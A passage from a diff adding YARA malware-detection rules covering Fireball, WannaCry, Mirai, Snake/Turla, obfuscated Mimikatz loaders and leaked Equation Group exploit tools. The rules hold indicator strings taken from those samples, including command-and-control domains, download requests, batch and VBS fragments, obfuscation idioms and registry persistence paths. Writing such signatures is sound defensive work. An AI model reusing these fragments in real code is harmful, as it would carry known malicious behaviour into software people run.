+      $s4 = "d\\\\.\\PhysicalDrive%d" fullword wide
+   condition: 
+      uint16 ( 0 ) == 0x5a4d and filesize < 400KB and ( $x1 or 3 of them )
+}
+
+rule clearlog_RID2A5A : APT DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Fireball malware - file clearlog_RID2A5A.dll"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4pTkGQ"
+      date = "2017-06-02 05:21:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3"
+      tags = "APT, DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "\\ClearLog\\Release\\logC.pdb" ascii
+      $s1 = "C:\\Windows\\System32\\cmd.exe /c \"\"" fullword wide
+      $s2 = "logC.dll" fullword ascii
+      $s3 = "hhhhh.exe" fullword wide
+      $s4 = "ttttt.exe" fullword wide
+      $s5 = "Logger Name:" fullword ascii
+      $s6 = "cle.log.1" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and $x1 or 2 of them )
+}
+
+rule Fireball_gubed_RID2C98 : APT DEMO EXE FILE MAL T1183 {
+   meta:
+      description = "Detects Fireball malware - file gubed.exe"
+      author = "Florian Roth"
+      reference = "https://goo.gl/4pTkGQ"
+      date = "2017-06-02 09:55:51"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2022-12-21"
+      hash1 = "e3f69a1fb6fcaf9fd93386b6ba1d86731cd9e5648f7cff5242763188129cd158"
+      tags = "APT, DEMO, EXE, FILE, MAL, T1183"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\MRT.exe" fullword wide
+      $x2 = "tIphlpapi.dll" fullword wide
+      $x3 = "http://%s/provide?clients=%s&reqs=visit.startload" fullword wide
+      $x4 = "\\Gubed\\Release\\Gubed.pdb" ascii
+      $x5 = "d2hrpnfyb3wv3k.cloudfront.net" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
+}
+
+rule TA459_Malware_May17_1_RID2DEE : DEMO FILE G0062 MAL {
+   meta:
+      description = "Detects TA459 related malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/RLf9qU"
+      date = "2017-05-31 10:52:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "5fd61793d498a395861fa263e4438183a3c4e6f1e4f098ac6e97c9d0911327bf"
+      tags = "DEMO, FILE, G0062, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s3 = "xtsewy" fullword ascii
+      $s6 = "CW&mhAklnfVULL" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x6152 and filesize < 800KB and all of them )
+}
+
+rule TA459_Malware_May17_2_RID2DEF : DEMO EXE FILE G0062 MAL {
+   meta:
+      description = "Detects TA459 related malware"
+      author = "Florian Roth"
+      reference = "https://goo.gl/RLf9qU"
+      date = "2017-05-31 10:53:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4601133e94c4bc74916a9d96a5bc27cc3125cdc0be7225b2c7d4047f8506b3aa"
+      tags = "DEMO, EXE, FILE, G0062, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $a1 = "Mcutil.dll" fullword ascii
+      $a2 = "mcut.exe" fullword ascii
+      $s1 = "Software\\WinRAR SFX" fullword ascii
+      $s2 = "AYou may need to run this self-extracting archive as administrator" fullword wide
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 900KB and all of ( $a* ) and 1 of ( $s* ) )
+}
+
+rule EternalRocks_taskhost_FR_RID30A5 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects EternalRocks Malware - file taskhost.exe"
+      author = "Florian Roth"
+      reference = "https://twitter.com/stamparm/status/864865144748298242"
+      date = "2017-05-18 12:48:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "cf8533849ee5e82023ad7adbdbd6543cb6db596c53048b1a0c00b3643a72db30"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "EternalRocks.exe" fullword wide
+      $s1 = "sTargetIP" fullword ascii
+      $s2 = "SERVER_2008R2_SP0" fullword ascii
+      $s3 = "20D5CCEE9C91A1E61F72F46FA117B93FB006DB51" fullword ascii
+      $s4 = "9EBF75119B8FC7733F77B06378F9E735D34664F6" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 15000KB and 1 of ( $x* ) or 3 of them )
+}
+
+rule EternalRocks_svchost_FR_RID303E : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects EternalRocks Malware - file taskhost.exe"
+      author = "Florian Roth"
+      reference = "https://twitter.com/stamparm/status/864865144748298242"
+      date = "2017-05-18 12:31:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "589af04a85dc66ec6b94123142a17cf194decd61f5d79e76183db026010e0d31"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "WczTkaJphruMyBOQmGuNRtSNTLEs" fullword ascii
+      $s2 = "svchost.taskhost.exe" fullword ascii
+      $s3 = "ConfuserEx v" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 500KB and 2 of them )
+}
+
+rule Docm_in_PDF_RID2B03 : DEMO FILE SUSP {
+   meta:
+      description = "Detects an embedded DOCM in PDF combined with OpenAction"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-05-15 08:48:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, SUSP"
+      minimum_yara = "2.2.0"
+      
+   strings:
+      $a1 = /<<\/Names\[\([\w]{1,12}.docm\)/ ascii
+      $a2 = "OpenAction" ascii fullword
+      $a3 = "JavaScript" ascii fullword
+   condition: 
+      uint32 ( 0 ) == 0x46445025 and all of them
+}
+
+rule WannCry_m_vbs_RID2C49 : CRIME DEMO FILE MAL RANSOM SCRIPT {
+   meta:
+      description = "Detects WannaCry Ransomware VBS"
+      author = "Florian Roth"
+      reference = "https://goo.gl/HG2j5T"
+      date = "2017-05-12 09:42:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "51432d3196d9b78bdc9867a77d601caffd4adaa66dcac944a5ba0b3112bbea3b"
+      tags = "CRIME, DEMO, FILE, MAL, RANSOM, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = ".TargetPath = \"C:\\@" ascii
+      $x2 = ".CreateShortcut(\"C:\\@" ascii
+      $s3 = " = WScript.CreateObject(\"WScript.Shell\")" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x4553 and filesize < 1KB and all of them )
+}
+
+rule WannCry_BAT_RID2B09 : CRIME DEMO FILE MAL RANSOM SCRIPT {
+   meta:
+      description = "Detects WannaCry Ransomware BATCH File"
+      author = "Florian Roth"
+      reference = "https://goo.gl/HG2j5T"
+      date = "2017-05-12 08:49:21"
+      score = 100
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077"
+      tags = "CRIME, DEMO, FILE, MAL, RANSOM, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "@.exe\">> m.vbs" ascii
+      $s2 = "cscript.exe //nologo m.vbs" fullword ascii
+      $s3 = "echo SET ow = WScript.CreateObject(\"WScript.Shell\")> " ascii
+      $s4 = "echo om.Save>> m.vbs" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x6540 and filesize < 1KB and 1 of them )
+}
+
+rule WannaCry_RansomNote_RID2E99 : CRIME DEMO FILE MAL RANSOM {
+   meta:
+      description = "Detects WannaCry Ransomware Note"
+      author = "Florian Roth"
+      reference = "https://goo.gl/HG2j5T"
+      date = "2017-05-12 11:21:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e"
+      tags = "CRIME, DEMO, FILE, MAL, RANSOM"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "A:  Don't worry about decryption." fullword ascii
+      $s2 = "Q:  What's wrong with my files?" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x3a51 and filesize < 2KB and all of them )
+}
+
+rule Mirai_1_May17_RID2B81 : DEMO FILE MAL {
+   meta:
+      description = "Detects Mirai Malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-05-12 09:09:21"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "172d050cf0d4e4f5407469998857b51261c80209d9fa5a2f5f037f8ca14e85d2"
+      hash2 = "9ba8def84a0bf14f682b3751b8f7a453da2cea47099734a72859028155b2d39c"
+      hash3 = "a393449a5f19109160384b13d60bb40601af2ef5f08839b5223f020f1f83e990"
+      tags = "DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "GET /bins/mirai.x86 HTTP/1.0" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 5000KB and all of them )
+}
+
+rule Miari_2_May17_RID2B82 : DEMO FILE MAL {
+   meta:
+      description = "Detects Mirai Malware"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-05-12 09:09:31"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "9ba8def84a0bf14f682b3751b8f7a453da2cea47099734a72859028155b2d39c"
+      hash2 = "a393449a5f19109160384b13d60bb40601af2ef5f08839b5223f020f1f83e990"
+      tags = "DEMO, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36" fullword ascii
+      $s2 = "GET /g.php HTTP/1.1" fullword ascii
+      $s3 = "https://%[^/]/%s" fullword ascii
+      $s4 = "pass\" value=\"[^\"]*\"" fullword ascii
+      $s5 = "jbeupq84v7.2y.net" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x457f and filesize < 5000KB and 2 of them )
+}
+
+rule SnakeTurla_Installd_SH_RID2F9F : DEMO FILE G0010 MAL RUSSIA SCRIPT {
+   meta:
+      description = "Detects Snake / Turla Sample"
+      author = "Florian Roth"
+      reference = "https://goo.gl/QaOh4V"
+      date = "2017-05-04 12:05:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, G0010, MAL, RUSSIA, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "PIDS=`ps cax | grep installdp" ascii
+      $s2 = "${SCRIPT_DIR}/installdp ${FILE}" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 20KB and all of them )
+}
+
+rule SnakeTurla_Install_SH_RID2F3B : DEMO FILE G0010 MAL RUSSIA SCRIPT {
+   meta:
+      description = "Detects Snake / Turla Sample"
+      author = "Florian Roth"
+      reference = "https://goo.gl/QaOh4V"
+      date = "2017-05-04 11:48:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "DEMO, FILE, G0010, MAL, RUSSIA, SCRIPT"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "${TARGET_PATH}/installd.sh" ascii
+      $s2 = "$TARGET_PATH2/com.adobe.update.plist" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x2123 and filesize < 20KB and all of them )
+}
+
+rule SnakeTurla_Malware_May17_1_RID30B1 : DEMO FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects Snake / Turla Sample"
+      author = "Florian Roth"
+      reference = "https://goo.gl/QaOh4V"
+      date = "2017-05-04 12:50:41"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      modified = "2023-01-06"
+      hash1 = "5b7792a16c6b7978fca389882c6aeeb2c792352076bf6a064e7b8b90eace8060"
+      tags = "DEMO, FILE, G0010, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "/Users/vlad/Desktop/install/install/" ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xfacf and filesize < 200KB and all of them )
+}
+
+rule SnakeTurla_Malware_May17_2_RID30B2 : DEMO FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects Snake / Turla Sample"
+      author = "Florian Roth"
+      reference = "https://goo.gl/QaOh4V"
+      date = "2017-05-04 12:50:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b8ee4556dc09b28826359b98343a4e00680971a6f8c6602747bd5d723d26eaea"
+      tags = "DEMO, FILE, G0010, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "b_openssl: oops - number of mutexes is 0" fullword ascii
+      $s2 = "networksetup -get%sproxy Ethernet" fullword ascii
+      $s3 = "012A04DECBC441e49C527B2798F54CA7LOG_NAMED_PIPE_NAME" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0xfacf and filesize < 6000KB and all of them )
+}
+
+rule SnakeTurla_Malware_May17_4_RID30B4 : DEMO FILE G0010 MAL RUSSIA {
+   meta:
+      description = "Detects Snake / Turla Sample"
+      author = "Florian Roth"
+      reference = "https://goo.gl/QaOh4V"
+      date = "2017-05-04 12:51:11"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "d5ea79632a1a67abbf9fb1c2813b899c90a5fb9442966ed4f530e92715087ee2"
+      tags = "DEMO, FILE, G0010, MAL, RUSSIA"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "Install Adobe Flash Player.app/com.adobe.updatePK" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x4b50 and filesize < 5000KB and all of them )
+}
+
+rule Enigma_Protected_Malware_May17_RhxFiles_RID3605 : DEMO EXE FILE MAL {
+   meta:
+      description = "Detects Enigma protected malware samples"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-05-02 16:38:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "2187d6bd1794bf7b6199962d8a8677f19e4382a124c30933d01aba93cc1f0f15"
+      tags = "DEMO, EXE, FILE, MAL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $op1 = { bd 9c 74 f6 7a 3a f7 94 c5 7d 7c 7c 7c 7e ae 73 } 
+      $op2 = { 82 62 6b 6b 6b 68 a5 ea aa 69 6b 6b 6b 3a 3b 94 } 
+      $op3 = { 7c 7c c5 7d 7c 7c 7c 7e ae 73 f9 79 7c 7c 7c f6 } 
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and all of them )
+}
+
+rule EnigmaPacker_Rare_RID2DA1 : DEMO EXE FILE MAL T1045 {
+   meta:
+      description = "Detects an ENIGMA packed executable"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-04-27 10:40:01"
+      score = 60
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "77be6e80a4cfecaf50d94ee35ddc786ba1374f9fe50546f1a3382883cb14cec9"
+      tags = "DEMO, EXE, FILE, MAL, T1045"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "P.rel$oc$" fullword ascii
+      $s2 = "ENIGMA" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 4000KB and all of them )
+}
+
+rule Obfuscated_VBS_April17_RID2F1A : ANOMALY DEMO HKTL OBFUS S0002 SCRIPT T1003 T1075 T1097 T1178 {
+   meta:
+      description = "Detects cloaked Mimikatz in VBS obfuscation"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-04-21 11:42:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "ANOMALY, DEMO, HKTL, OBFUS, S0002, SCRIPT, T1003, T1075, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "::::::ExecuteGlobal unescape(unescape(" ascii
+   condition: 
+      filesize < 500KB and all of them
+}
+
+rule Obfuscated_JS_April17_RID2ECC : ANOMALY DEMO HKTL OBFUS S0002 T1003 T1075 T1097 T1178 {
+   meta:
+      description = "Detects cloaked Mimikatz in JS obfuscation"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-04-21 11:29:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "ANOMALY, DEMO, HKTL, OBFUS, S0002, T1003, T1075, T1097, T1178"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "\";function Main(){for(var " ascii
+      $s2 = "=String.fromCharCode(parseInt(" ascii
+      $s3 = "));(new Function(" ascii
+   condition: 
+      filesize < 500KB and all of them
+}
+
+rule EquationGroup_scanner_output_RID32BD : APT DEMO HKTL {
+   meta:
+      description = "Detects output generated by EQGRP scanner.exe"
+      author = "Florian Roth"
+      reference = "Internal Research"
+      date = "2017-04-17 14:18:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      
+      tags = "APT, DEMO, HKTL"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s0 = "# scanning ip  " ascii
+      $s1 = "# Scan for windows boxes" ascii fullword
+      $s2 = "Going into send" ascii fullword
+      $s3 = "# Does not work" ascii fullword
+      $s4 = "You are the weakest link, goodbye" ascii fullword
+      $s5 = "rpc   Scan for RPC  folks" ascii fullword
+   condition: 
+      filesize < 1000KB and 2 of them
+}
+
+rule EquationGroup_Toolset_Apr17_Eclipsedwing_Rpcproxy_Pcdlllauncher_RID403A : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 23:53:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "48251fb89c510fb3efa14c4b5b546fbde918ed8bb25f041a801e3874bd4f60f8"
+      hash2 = "237c22f4d43fdacfcbd6e1b5f1c71578279b7b06ea8e512b4b6b50f10e8ccf10"
+      hash3 = "79a584c127ac6a5e96f02a9c5288043ceb7445de2840b608fc99b55cf86507ed"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[-] Failed to Prepare Payload!" fullword ascii
+      $x2 = "ShellcodeStartOffset" fullword ascii
+      $x3 = "[*] Waiting for AuthCode from exploit" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Explodingcantouch_1_2_1_RID3AA6 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:55:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "0cdde7472b077610d0068aa7e9035da89fe5d435549749707cae24495c8d8444"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[-] Connection closed by remote host (TCP Ack/Fin)" fullword ascii
+      $s2 = "[!]Warning: Error on first request - path size may actually be larger than indicated." fullword ascii
+      $s4 = "<http://%s/%s> (Not <locktoken:write1>) <http://%s/>" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Architouch_1_0_0_RID37AE : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:48:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $s1 = "[+] Target is %s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Erraticgopher_1_0_1_RID38F4 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:43:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "3d11fe89ffa14f267391bc539e6808d600e465955ddb854201a1f31a9ded4052"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[-] Error appending shellcode buffer" fullword ascii
+      $x2 = "[-] Shellcode is too big" fullword ascii
+      $x3 = "[+] Exploit Payload Sent!" fullword ascii
+      $x4 = "[+] Bound to Dimsvc, sending exploit request to opnum 29" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Esteemaudit_2_1_0_RID3820 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:07:51"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "61f98b12c52739647326e219a1cf99b5440ca56db3b6177ea9db4e3b853c6ea6"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[+] Connected to target %s:%d" fullword ascii
+      $x2 = "[-] build_exploit_run_x64():" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Darkpulsar_1_1_0_RID37BE : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:51:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "b439ed18262aec387984184e86bfdb31ca501172b1c066398f8c56d128ba855a"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[%s] - Error upgraded DLL architecture does not match target architecture (0x%x)" fullword ascii
+      $x2 = "[%s] - Error building DLL loading shellcode" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Educatedscholar_1_0_0_RID39AF : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:14:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "4cce9e39c376f67c16df3bcd69efd9b7472c3b478e2e5ef347e1410f1105c38d"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[+] Shellcode Callback %s:%d" fullword ascii
+      $x2 = "[+] Exploiting Target" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Doublepulsar_1_3_1_RID389A : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 18:28:11"
+      score = 90
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[+] Ping returned Target architecture: %s - XOR Key: 0x%08X" fullword ascii
+      $x2 = "[.] Sending shellcode to inject DLL" fullword ascii
+      $x3 = "[-] Error setting ShellcodeFile name" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Erraticgophertouch_1_0_1_RID3B17 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 20:14:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "729eacf20fe71bd74e57a6b829b45113c5d45003933118b53835779f0b049bad"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[-] Unable to connect to broswer named pipe, target is NOT vulnerable" fullword ascii
+      $x2 = "[-] Unable to bind to Dimsvc RPC syntax, target is NOT vulnerable" fullword ascii
+      $x3 = "[+] Bound to Dimsvc, target IS vulnerable" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 30KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Smbtouch_1_1_1_RID36EB : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 17:16:21"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[+] Target is vulnerable to %d exploit%s" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Educatedscholartouch_1_0_0_RID3BD2 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 20:45:31"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f4b958a0d3bb52cb34f18ea293d43fa301ceadb4a259d3503db912d0a9a1e4d8"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[!] A vulnerable target will not respond." fullword ascii
+      $x2 = "[-] Target NOT Vulernable" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 30KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Esteemaudittouch_2_1_0_RID3A43 : APT DEMO EXE FILE {
+   meta:
+      description = "Detects EquationGroup Tool - April Leak"
+      author = "Florian Roth"
+      reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+      date = "2017-04-15 19:39:01"
+      score = 75
+      customer = "demo"
+      license = "CC-BY-NC https://creativecommons.org/licenses/by-nc/4.0/"
+      hash1 = "f6b9caf503bb664b22c6d39c87620cc17bdb66cef4ccfa48c31f2a3ae13b4281"
+      tags = "APT, DEMO, EXE, FILE"
+      minimum_yara = "1.7"
+      
+   strings:
+      $x1 = "[-] Touching the target failed!" fullword ascii
+      $x2 = "[-] OS fingerprint not complete - 0x%08x!" fullword ascii
+   condition: 
+      ( uint16 ( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+}
+
+rule EquationGroup_Toolset_Apr17_Rpctouch_2_1_0_RID36EE : APT DEMO EXE FILE {
+   meta:
